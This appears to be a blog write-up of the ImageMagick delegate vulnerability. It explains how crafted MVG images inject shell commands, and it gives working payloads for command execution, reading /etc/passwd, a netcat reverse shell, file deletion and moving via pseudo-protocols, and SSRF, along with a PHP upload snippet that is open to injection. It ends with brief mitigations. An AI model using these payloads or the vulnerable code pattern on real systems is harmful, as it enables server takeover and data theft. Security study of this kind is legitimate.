What is ImageMagick ..?
ImageMagick is a free and open-source software suite for displaying, converting, and editing raster image and vector image files. Its capable of manipulating images through command line interface which will be very useful for web developers while converting or editing the images before storing them inside their databases.
Mostly PHP and Perl based web application will use this feature to compare the resolutions and convert it into different formats like thumbnails. Sample command line syntax to convert image in PHP as follows
system("convert ".$target_file." ".$target_dir.$_files['fileToUpload']['tmp_name']);
What’s Wrong With ImageMagick..?
ImageMagick uses Delegate feature to work with images and process them using external system libraries. Delegates configuration file is located in /etc/ImageMagick path which will process input/output arguments with help of system(‘commands’).
Eg: <delegate decode="doc" command=""@DOCDecodeDelegate@" --convert-to pdf -outdir `dirname "%i"` "%i" 2> "%u"; @MVDelegate@ "%i.pdf" "%o""/>
The above example shows how exactly ImageMagick delegates feature will work. Basically it will guess the file type by its content and it process that document into DecodeDelegates via Command Tag. then it will convert to output file.
Everything is fine but when if we take a look at https delegate which will actually handles the https requests.
<delegate decode="https" command=""@WWWDecodeDelegate@" -s -k -L -o "%o" "https:%M""/>
ImageMagick will handle the https requests normally like follows.
"wget" -q -O "%o" "https:%M"
Here %M is the actual input link like https://nullnews.in. Due to insufficient %M parameter filtering i am able to execute shell commands
The Most Dangerous part here is ImageMagick will support mvg and svg image formats. As a result, any service, which uses ImageMagick to process images and uses default delegates.xml/policy.xml, may be vulnerable to Remote Command Execution and SSRF.
Proof Of Concept:
Remote Command Execution:
As explained above i created a simple mvg (Magic Vector Graphics) image like below.
push graphic-context viewbox 0 0 640 480 fill 'url(http://nullnews.in/someimage.jpg| pwd")' pop graphic-context
I am uploading this image as exploit.mvg in My Buggy Profile Application where i am using image conversion feature of ImageMagick.
Once i uploaded exploit.mvg it gave me the current directory result.
What’s next i dumped /etc/passwd.
It’s also possible to take the Reverse Shell via image upload with following exploit.
push graphic-context viewbox 0 0 640 480 fill 'url(http://nullnews.in/someimage.jpg| nc -e /bin/sh 127.0.0.1 1234")' pop graphic-context
Its possible to delete files on server with help of ImageMagick Ephemeral Pseudo Protocol.
push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'ephemeral:/tmp/sample.txt' popgraphic-context
To move the files we can use MSL Pseudo Protocol.
push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'msl:/tmp/sample.txt' popgraphic-context
I created sample.txt in /tmp directory and whenever i’m trying to convert that image /tmp/sample.txt got deleted.
Server Side Request Forgery:
We are able to send request to another sites via https request.
push graphic-context viewbox 0 0 640 480 fill 'url(http://nullnews.in)' pop graphic-context
I am uploading ssrf.mvg file and listening to outgoing traffic via tcpdump.
sudo tcpdump -i any -w /tmp/http.log &
Once file got uploaded into server the application is sending external request to https://nullnews.in.
As shown above it was very clear that we are able to send external request to https://nullnews.in from our Buggy Profile Application. In this way we can scan the ports and services on https://nullnews.in.
As i told earlier ImageMagick tried to guess the content type not by its extension. So if mvg/svg files are blocked then again we can perform similar attacks with png/jpeg images.
- Remove the support of SVG and MVG files under delegates/policy file.
- Trust No One – Sanitise user input by filtering out the malicious image content.